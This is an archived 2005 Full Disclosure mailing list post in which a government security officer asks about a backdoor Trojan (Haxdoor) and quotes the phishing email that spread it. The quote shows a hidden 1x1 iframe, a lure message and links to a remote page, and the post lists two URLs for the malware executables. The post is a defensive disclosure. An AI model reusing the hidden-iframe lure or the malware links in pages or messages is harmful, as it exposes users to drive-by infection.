Full Disclosure mailing list archives

Virus on web site

From: "Peter B. Harvey (Information Security)" <peterharvey () emergency qld gov au>
Date: Tue, 2 Aug 2005 14:49:49 +1000



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi all,

This virus at the time of my posting this is only detedted by
Kasperski and I cannot find any detail on the virus. Came in the
email as given below.

URL for the virus http://www.alias-search.com/images/msits.exe
Also found was the following url also the same virus
http://www.alias-search.com/images/msitsa.exe

Kasperski detects it as  msits.exe - infected by
Backdoor.Win32.Haxdoor.dw

Anyone with info on this virus?

Peter


Email Body Text
______________________________________________________________________
___________________________________


<IFRAME width="1" height="1"
SRC="http://www.alias-search.com/include/version_1567/select.html";
frameBorder="1"

scrolling="no"></IFRAME>










<BR>
Hi!<BR>
At me a problem with sending.<BR>
I can not remove a problem...<BR>
See screen. Make preliminary search on this word.<BR>
Thanks!<BR>



<BR><BR>
<A
href="http://www.alias-search.com/include/version_1567/select.html";>Sc
reen</A>
<BR>

______________________________________________________________________
________________________

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1

iQA/AwUBQu77bP2VmmbibZoUEQLaxACfW9oC10lGWQ738RaTEKok6ncr7TYAoNt9
gFvM0q5/rrtgJgXEpU3b4KBq
=Fh/3
-----END PGP SIGNATURE-----

This correspondence is for the named persons only.
It may contain confidential or privileged information or both.
No confidentiality or privilege is waived or lost by any mis transmission.
If you receive this correspondence in error please delete it from your system immediately and notify the sender.
You must not disclose, copy or relay on any part of this correspondence, if you are not the intended recipient.
Any opinions expressed in this message are those of the individual sender except where the sender expressly,
and with the authority, states them to be the opinions of the Department of Emergency Services, Queensland.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

Virus on web site Peter B. Harvey (Information Security) (Aug 01)
- REGUSTERFLY To The White Courtesy Phone Please? (Was: Re: Virus on web site) J.A. Terranson (Aug 01)
- Re: Virus on web site Johannes Schneider (Aug 02)
  - Re: Virus on web site Nick FitzGerald (Aug 02)
- <Possible follow-ups>
- Re: Virus on web site Peter B. Harvey (Information Security) (Aug 02)
  - Re: Virus on web site Nick FitzGerald (Aug 02)